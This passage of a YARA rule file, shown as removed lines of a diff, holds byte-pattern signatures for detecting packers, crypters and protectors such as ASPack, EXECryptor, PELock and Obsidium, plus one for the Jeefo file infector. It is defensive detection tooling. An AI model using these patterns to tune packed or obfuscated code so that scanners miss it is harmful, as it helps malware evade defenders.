-	$a2 = { 00 00 00 00 55 73 65 72 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 64 69 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 44 65 66 57 69 6E 64 6F 77 50 72 6F 63 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 67 69 73 74 65 72 43 6C 61 73 73 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 43 72 65 61 74 65 57 69 6E 64 6F 77 45 78 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 53 79 73 74 65 6D 4D 65 74 72 69 63 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 53 68 6F 77 57 69 6E 64 6F 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 47 65 74 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 52 65 6C 65 61 73 65 44 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 46 69 6E 64 57 69 6E 64 6F 77 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65 74 4D 65 73 73 61 67 65 41 00 }
-
-condition:
-		$a0 or $a1 or $a2
-}
-	
-	
-rule XPackv142
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 72 ?? C3 8B DE 83 ?? ?? C1 ?? ?? 8C D8 03 C3 8E D8 8B DF 83 ?? ?? C1 ?? ?? 8C C0 03 C3 8E C0 C3 }
-
-condition:
-		$a0
-}
-	
-	
-rule W32JeefoPEFileInfector
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 83 C4 F4 6A 02 A1 C8 ?? ?? ?? FF D0 E8 ?? ?? ?? ?? C9 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeSplitter13SplitCryptMethodBillPrisonerTPOC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 15 10 05 23 14 56 57 57 48 12 0B 16 66 66 66 66 66 66 66 66 66 02 C7 56 66 66 66 ED 26 6A ED 26 6A ED 66 E3 A6 69 E2 39 64 66 66 ED 2E 56 E6 5F 0D 12 61 E6 5F 2D 12 64 8D 81 E6 1F 6A 55 12 64 8D B9 ED 26 7E A5 33 ED 8A 8D 69 21 03 12 36 14 09 05 27 02 02 14 03 15 15 27 ED 2B 6A ED 13 6E ED B8 65 10 5A EB 10 7E EB 10 06 ED 50 65 95 30 ED 10 46 65 95 55 B4 ED A0 ED 50 65 95 37 ED 2B 6A EB DF AB 76 26 66 3F DF 68 66 66 66 9A 95 C0 6D AF 13 64 }
-	$a1 = { E8 00 00 00 00 5D 81 ED 05 10 40 00 B9 ?? ?? ?? ?? 8D 85 1D 10 40 00 80 30 66 40 E2 FA 8F 98 67 66 66 ?? ?? ?? ?? ?? ?? ?? 66 }
-
-condition:
-		$a0 or $a1 at pe.entry_point
-}
-	
-	
-rule AntiDote12BetaDemoSISTeam
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 69 D6 00 00 E8 C6 FD FF FF 68 69 D6 00 00 E8 BC FD FF FF 83 C4 08 E8 A4 FF FF FF 84 C0 74 2F 68 04 01 00 00 68 B0 21 60 00 6A 00 FF 15 08 10 60 00 E8 29 FF FF FF 50 68 88 10 60 00 68 78 10 60 00 68 B0 21 60 00 E8 A4 FD FF FF 83 C4 10 33 C0 C2 10 00 90 90 90 90 90 90 90 90 90 90 90 90 8B 4C 24 08 56 8B 74 24 08 33 D2 8B C6 F7 F1 8B C6 85 D2 74 08 33 D2 F7 F1 40 0F AF C1 5E C3 90 8B 44 24 04 53 55 56 8B 48 3C 57 03 C8 33 D2 8B 79 54 8B 71 38 8B C7 F7 F6 85 D2 74 0C 8B C7 33 D2 F7 F6 8B F8 47 0F AF FE 33 C0 33 DB 66 8B 41 14 8D 54 08 18 33 C0 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASPackv211bAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor224StrongbitSoftCompleteDevelopmenth1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 04 00 00 00 FF FF FF FF 5E C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor224StrongbitSoftCompleteDevelopmenth2
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 F7 FE FF FF 05 ?? ?? 00 00 FF E0 E8 EB FE FF FF 05 ?? ?? 00 00 FF E0 E8 ?? 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule EXECryptor224StrongbitSoftCompleteDevelopmenth3
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
-
-condition:
-		$a0
-}
-	
-	
-rule ProActivateV10XTurboPowerSoftwareCompany
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC B9 0E 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? ?? ?? ?? 90 90 90 90 90 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 A1 ?? ?? ?? ?? 83 C0 05 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 0D 00 00 00 E8 85 E2 FF FF 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 7A 81 3D ?? ?? ?? ?? 43 52 43 33 75 6E 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 62 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 56 81 3D ?? ?? ?? ?? 43 52 43 33 75 4A 81 3D ?? ?? ?? ?? 32 40 7E 7E 75 3E 81 3D ?? ?? ?? ?? 21 7E 7E 40 75 32 81 3D ?? ?? ?? ?? 43 52 43 33 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PackMasterv10
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
-	$a1 = { 60 E8 01 ?? ?? ?? E8 83 C4 04 E8 01 ?? ?? ?? E9 5D 81 ED D3 22 40 ?? E8 04 02 ?? ?? E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule DBPEv153
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FreeJoiner152Stubengine16GlOFF
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 46 FD FF FF 50 E8 0C 00 00 00 FF 25 08 20 40 00 FF 25 0C 20 40 00 FF 25 10 20 40 00 FF 25 14 20 40 00 FF 25 18 20 40 00 FF 25 1C 20 40 00 FF 25 20 20 40 00 FF 25 24 20 40 00 FF 25 28 20 40 00 FF 25 00 20 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ASProtectv12AlexeySolodovnikovh1
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }
-
-condition:
-		$a0
-}
-	
-	
-rule FSGv110EngdulekxtBorlandDelphiMicrosoftVisualCx
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PENightMare2Beta
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MinGWGCC3x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 89 E5 83 EC 08 C7 04 24 ?? 00 00 00 FF 15 ?? ?? ?? ?? E8 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? 55 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PIRITv15
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B4 4D CD 21 E8 ?? ?? FD E8 ?? ?? B4 51 CD 21 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Reg2Exe224byJanVorel
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 E8 CF 20 00 00 A3 F4 45 40 00 E8 CB 20 00 00 6A 0A 50 6A 00 FF 35 F4 45 40 00 E8 07 00 00 00 50 E8 BB 20 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 F8 45 40 00 E8 06 19 00 00 83 C4 0C 8B 44 24 04 A3 FC 45 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 8C 20 00 00 A3 F8 45 40 00 E8 02 20 00 00 E8 32 1D 00 00 E8 20 19 00 00 E8 A3 16 00 00 68 01 00 00 00 68 38 46 40 00 68 00 00 00 00 8B 15 38 46 40 00 E8 71 4F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 4F 00 00 FF 35 48 41 40 00 B8 00 01 00 00 E8 9D 15 00 00 8D 0D 1C 46 40 00 5A E8 82 16 00 00 68 00 01 00 00 FF 35 1C 46 40 00 E8 24 20 00 00 A3 24 46 40 00 FF 35 48 41 40 00 FF 35 24 46 40 00 FF 35 1C 46 40 00 E8 DC 10 00 00 8D 0D 14 46 40 00 5A E8 4A 16 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule SVKProtectorv13xEngPavolCerven
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ThinstallEmbedded2609Jitit
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 58 BB AD 19 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 1C 00 00 68 80 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXcrypterarchphaseNWC
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BF ?? ?? ?? 00 81 FF ?? ?? ?? 00 74 10 81 2F ?? 00 00 00 83 C7 04 BB 05 ?? ?? 00 FF E3 BE ?? ?? ?? 00 FF E6 00 00 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule StarForceProtectionDriverProtectionTechnology
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 57 68 ?? 0D 01 00 68 00 ?? ?? 00 E8 50 ?? FF FF 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FishPEV10Xhellfish
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 ?? ?? ?? ?? C3 90 09 00 00 00 2C 00 00 00 ?? ?? ?? ?? C4 03 00 00 BC A0 00 00 00 40 01 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 00 00 00 00 8A 00 00 00 10 00 00 ?? ?? 00 00 ?? ?? ?? ?? 00 00 02 00 00 00 A0 00 00 18 01 00 00 ?? ?? ?? ?? 00 00 0C 00 00 00 B0 00 00 38 0A 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 C0 00 00 40 39 00 00 ?? ?? ?? ?? 00 00 08 00 00 00 00 01 00 C8 06 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PECrypter
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 5D EB 26 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule tElockv051
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule LY_WGKXwwwszleyucom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 4D 79 46 75 6E 00 62 73 }
-
-condition:
-		$a0
-}
-	
-	
-rule ASProtect13321RegisteredAlexeySolodovnikov
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule RLPackV111ap0x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule FSGv110EngdulekxtMicrosoftVisualC4xLCCWin321x
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 2C 71 1B CA EB 01 2A EB 01 65 8D 35 80 ?? ?? 00 80 C9 84 80 C9 68 BB F4 00 00 00 EB 01 EB }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule dePACKdeNULL
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? 00 00 E8 ?? 00 00 00 }
-	$a1 = { EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? ?? 00 E8 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? D2 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule EXECryptorv1401
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule MSLRHv032afakePELockNT204emadicius
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 EB 03 CD 20 EB EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 03 CD 20 EB EB 03 CD 20 03 61 9D 83 C4 04 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELockNTv203
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Reg2Exe220221byJanVorel
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 6A 00 E8 7D 12 00 00 A3 A0 44 40 00 E8 79 12 00 00 6A 0A 50 6A 00 FF 35 A0 44 40 00 E8 0F 00 00 00 50 E8 69 12 00 00 CC CC CC CC CC CC CC CC CC 68 2C 02 00 00 68 00 00 00 00 68 B0 44 40 00 E8 3A 12 00 00 83 C4 0C 8B 44 24 04 A3 B8 44 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 32 12 00 00 A3 B0 44 40 00 68 F4 01 00 00 68 BC 44 40 00 FF 35 B8 44 40 00 E8 1E 12 00 00 B8 BC 44 40 00 89 C1 8A 30 40 80 FE 5C 75 02 89 C1 80 FE 00 75 F1 C6 01 00 E8 EC 18 00 00 E8 28 16 00 00 E8 4A 12 00 00 68 00 FA 00 00 68 08 00 00 00 FF 35 B0 44 40 00 E8 E7 11 00 00 A3 B4 44 40 00 8B 15 D4 46 40 00 E8 65 0A 00 00 BB 00 00 10 00 B8 01 00 00 00 E8 72 0A 00 00 74 09 C7 00 01 00 00 00 83 C0 04 A3 D4 46 40 00 FF 35 B4 44 40 00 E8 26 05 00 00 8D 0D B8 46 40 00 5A E8 CF 0F 00 00 FF 35 B4 44 40 00 FF 35 B8 46 40 00 E8 EE 06 00 00 8D 0D B4 46 40 00 5A E8 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELockNTv201
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PELockNTv204
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule UPXFreakv01BorlandDelphiHMX0101
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }
-	$a1 = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }
-
-condition:
-		$a0 at pe.entry_point or $a1 at pe.entry_point
-}
-	
-	
-rule Obsidium13017Obsidiumsoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petite22c199899IanLuck
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 68 ?? ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 68 00 00 ?? ?? 8B 3C 24 8B 30 66 81 C7 80 07 8D 74 06 08 89 38 8B 5E 10 50 56 6A 02 68 80 08 00 00 57 6A ?? 6A 06 56 6A 04 68 80 08 00 00 57 FF D3 83 EE 08 59 F3 A5 59 66 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PluginToExev101BoBBobSoft
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 00 00 00 00 29 C0 5D 81 ED C6 41 40 00 50 8F 85 71 40 40 00 50 FF 95 A5 41 40 00 89 85 6D 40 40 00 FF 95 A1 41 40 00 50 FF 95 B5 41 40 00 80 38 00 74 16 8A 08 80 F9 22 75 07 50 FF 95 B9 41 40 00 89 85 75 40 40 00 EB 6C 6A 01 8F 85 71 40 40 00 6A 58 6A 40 FF 95 A9 41 40 00 89 85 69 40 40 00 89 C7 68 00 08 00 00 6A 40 FF 95 A9 41 40 00 89 47 1C C7 07 58 00 00 00 C7 47 20 00 08 00 00 C7 47 18 01 00 00 00 C7 47 34 04 10 88 00 8D 8D B9 40 40 00 89 4F 0C 8D 8D DB 40 40 00 89 4F 30 FF B5 69 40 40 00 FF 95 95 41 40 00 FF 77 1C 8F 85 75 40 40 00 8B 9D 6D 40 40 00 60 6A 00 6A 01 53 81 C3 ?? ?? ?? 00 FF D3 61 6A 00 68 44 69 45 50 FF B5 75 40 40 00 6A 00 81 C3 ?? ?? 00 00 FF D3 83 C4 10 83 BD 71 40 40 00 00 74 10 FF 77 1C FF 95 AD 41 40 00 57 FF 95 AD 41 40 00 6A 00 FF 95 9D 41 40 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Enigmaprotector110unregistered
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 }
-	$a1 = { 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 E9 51 0B C4 80 BC 7E 35 09 37 E7 C9 3D C9 45 C9 4D 74 92 BA E4 E9 24 6B DF 3E 0E 38 0C 49 10 27 80 51 A1 8E 3A A3 C8 AE 3B 1C 35 }
-
-condition:
-		$a0 or $a1
-}
-	
-	
-rule Obsidium1341ObsidiumSoftware
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule WebCopsDLLLINKDataSecurity
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { A8 BE 58 DC D6 CC C4 63 4A 0F E0 02 BB CE F3 5C 50 23 FB 62 E7 3D 2B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule PseudoSigner01PackMaster10PEXCloneAnorganix
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 60 E8 01 01 00 00 E8 83 C4 04 E8 01 90 90 90 E9 5D 81 ED D3 22 40 90 E8 04 02 90 90 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Upackv037v038BetaStripbaserelocationtableOptionDwing
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 53 18 33 C0 55 40 51 D3 E0 8B EA 91 FF 56 4C 33 }
-
-condition:
-		$a0
-}
-	
-	
-rule AHTeamEPProtector03fakeSVKP13xFEUERRADER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 00 00 00 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule InstallShieldCustom
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { 55 8B EC 83 EC 44 56 FF 15 ?? ?? 41 00 8B F0 85 F6 75 08 6A FF FF 15 ?? ?? 41 00 8A 06 57 8B 3D ?? ?? 41 00 3C 22 75 1B 56 FF D7 8B F0 8A 06 3C 22 74 04 84 C0 75 F1 80 3E 22 75 15 56 FF D7 8B }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule Petitevafterv14
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { B8 ?? ?? ?? ?? 66 9C 60 50 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 83 }
-
-condition:
-		$a0 at pe.entry_point
-}
-	
-	
-rule ExeToolsv21EncruptorbyDISMEMBER
-{
-      meta:
-		author="malware-lu"
-strings:
-		$a0 = { E8 ?? ?? 5D 83 ?? ?? 1E 8C DA 83 ?? ?? 8E DA 8E C2 BB ?? ?? BA ?? ?? 85 D2 74 }
-
-condition:
-		$a0 at pe.entry_point
